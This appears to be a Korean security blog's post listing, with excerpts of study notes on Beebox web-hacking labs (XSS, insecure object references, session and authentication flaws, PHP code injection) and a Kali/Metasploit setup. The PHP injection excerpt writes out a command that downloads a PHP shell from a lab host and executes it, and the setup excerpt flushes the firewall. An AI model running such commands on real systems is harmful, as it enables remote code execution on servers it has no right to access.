본문 바로가기

분류 전체보기

Study records/Web hacking 2024. 7. 18. [Beebox] 인코딩 복호화/HTML5 웹 저장소/중요 정보 텍스트 파일 저장 인코딩 복호화Security level : low       Security level : medium   SHA1로 이루어진 걸 볼 수 있다.    HTML5 웹 저장소     ' '  : JavaScript로 이루어진 이 코드 'localStorage'에 저장된 모든 키-값 쌍을 웹 페이지에 표시한다.  텍스트 파일 저장      Salt는 암호화 및 해시 작업에서 보안 강화를 위해 사용되는 추가 데이터다. 비밀번호를 해시할 때, 동일한 비밀번호가 동일한 해시 값을 가지지 않도록 임의의 값을 추가하여 해시 계산을 한다.
Study records/Web hacking 2024. 7. 18. [Beebox] 보안 설정 오류(구글해킹, Robots.txt, Webdav) Google Hacking Database는 특정 검색어(Dorks)를 사용하여 공개된 웹페이지에서 민감한 정보를 찾아내는 방법들을 모아둔 데이터베이스다. 이러한 검색어들은 구글 검색 엔진을 통해 취약한 서버나 파일, 민감한 정보를 쉽게 찾을 수 있도록 한다. Dork: 구글 검색에 사용할 수 있는 특수 검색어 또는 구문. 이를 통해 특정 유형의 정보를 검색할 수 있다.Category: 검색어가 어떤 유형의 취약점을 탐지하는지에 대한 분류. 예를 들어, 파일에 포함된 비밀번호, 취약한 서버, 민감한 정보 등이 포함된다.Date Added: 검색어가 데이터베이스에 추가된 날짜.Author: 해당 검색어를 제안한 사람.  'robots.txt' 파일은 웹사이트의 루트 디렉토리에 위치하는 텍스트 파일로, 웹 ..
Study records/Web hacking 2024. 7. 17. [Beebox] 취약한 직접 객체 참조(Insecure DOR) Insecure DOR(Change Secret)비밀 정보를 변경할 수 있는 페이지에서 사용자가 자신의 ID를 포함한 요청을 전송할 때, 이를 조작하여 다른 사용자의 비밀 정보를 변경한다.     프록시를 잡고 Change      Security Level : high    토큰 검증!isset($_REQUEST["token"]): 요청에 "token" 파라미터가 포함되지 않은 경우.!isset($_SESSION["token"]): 세션에 "token" 값이 설정되지 않은 경우.$_REQUEST["token"] != $_SESSION["token"]: 요청에서 받은 토큰과 세션에 저장된 토큰이 일치하지 않는 경우.이 세 가지 조건 중 하나라도 참이면, 토큰 검증에 실패한 것으로 간주된다.    Inse..
Study records/Web hacking 2024. 7. 17. [Beebox] 크로스 사이트 스크립트(XSS) 취약점 크로스 사이트 스크립트(XSS) 취약점 - Stored 방식 1. XSS - Stored(Blog)공격자가 블로그 게시물이나 댓글에 악의적인 스크립트를 삽입한다. 이 스크립트는 블로그에 저장되며, 블로그를 방문하는 모든 사용자에게 실행된다. 사용자 입력을 서버 측에서 검증하고 저장하기 전에 HTML 인코딩을 적용하고, 데이터를 출력할 때 HTML 인코딩을 사용하여 브라우저가 스크립트를 실행하지 않도록 한다.   2. XSS - Stored(Change Secret)사용자 설정 페이지에서 비밀 정보를 변경할 때 악의적인 스크립트를 삽입한다. 변경된 비밀 정보는 서버에 저장되고, 해당 정보를 조회할 때마다 스크립트가 실행된다.  비밀 정보(비밀번호 등)를 변경할 때 입력된 데이터를 검증하고 인코딩하고, 변경..
Study records/Web hacking 2024. 7. 16. [Beebox] 세션 관리 미흡에 의한 취약점 security level : low      security level : medium      세션 관리가 제대로 이루어지지 않으면 사용자의 인증 정보가 탈취될 수 있고, 권한 상승 공격 등의 공격에 취약해질 수 있다.  세션 ID의 안전한 생정과 관리 : 세션 ID는 예측 불가능해야 하며, 충분히 길고 복잡해야 한다. 안전한 난수 생성기를 사용하여 세션 ID를 생성한다.세션 ID의 안전한 전송 : HTTPS와 같은 암호화된 채널을 통해 전송되어야 한다. 이를 통해 중간에서의 도청을 방지할 수 있다.세션 타임아웃 설정 : 사용자가 일정 시간 동안 활동하지 않으면 세션을 자동으로 종료하도록 타임아웃을 설정한다.세션 고정 공격 방지 : 사용자가 로그인할 때마다 세션 ID를 새로 발급하여 공격자가 사전에 ..
Study records/Web hacking 2024. 7. 16. [Beebox] 인증 결함(Broken Authentication)에 의한 취약점 Broken Authentication은 웹 애플리케이션이 사용자의 신원을 확인하거나 세션을 관리하는 과정에서 취약점을 가지고 있어, 악의적인 사용자가 다른 사람의 계정에 접근할 수 있는 상황을 말한다.    크롬 자바스크립트 콘솔에서 쉽게 해독 가능하다.      약한 비밀 번호는 사전 공격(dictionary attack)이나 무차별 대입 공격(brute force attack)으로 쉽게 해킹될 수 있다.     sniper로 하나만 집중 공격(bug)           아래 사이트는 비밀번호를 해독하는데 걸리는 시간과 같은 정보를 제공하여 비밀번호의 안전성을 측정한다.      강력한 비밀번호 정책: 최소 12자, 대문자, 소문자, 숫자, 특수 문자 포함.다단계 인증(MFA): 비밀번호 외에 추가 ..
Study records/Linux server hacking 2024. 7. 12. [Metasploit] 삼바 서비스 구축 SSH 서비스를 설치한 뒤 루트 계정으로도 SSH 서비스에 원격 접속이 가능하도록 변경한다.  update-rc.d ssh enable  명령어는 칼리 운영체제 시작과 동시에 SSH 서비스를 구동시키겠다는 의미다.   기본 웹 페이지 경로와 아파치 구성 파일에서 기본 웹 페이지 경로를 확인한다.       이 설정은 나중에 악성 코드 생성 후 윈도우 운영체제에서 실행할 때 필요하다.  iptables -F && iptables -L 명령어는 칼리에서 기본적으로 동작하는 IPTables라는 소프트웨어 방화벽 설정을 모두 초기화시키겠다는 의미다. 칼리 운영체제에서 모의 침투를 수행할 때 방화벽은 종종 걸림돌로 작용할 수 있다. 가급적 방화벽 설정은 초기 상태를 유지하는 편이 좋다.   netstat -tan..
Study records/Web hacking 2024. 6. 26. [Beebox] php code Injection과 내부 침투 시나리오 외부 입력을 실행하는 'eval()' 함수 사용은 피해야 하며, 사용자 입력을 신뢰할 수 없는 경우 반드시 검증하고 적절한 필터링을 해야한다.            'wget http://192.168.56.107/phpshell.txt -O /tmp/phpshell.php' 명령어를 실행하여 원격 서버에서 'phpshell.txt' 파일을 다운로드하고 '/tmp/phpshell.php' 로 저장한다. 'php -f /tmp/phpshell.php'명령어를 실행하여 다운로드한 php 파일을 실행한다.이 코드는 외부 입력을 통해 서버에서 임의의 명령어를 실행할 수 있기 때문에 매우 위험하다. 사용자 입력은 항상 검증하고, 외부 명령어 실행이 필요할 경우 입력값을 안전하게 처리하는 방법을 사용해야 한다.

티스토리툴바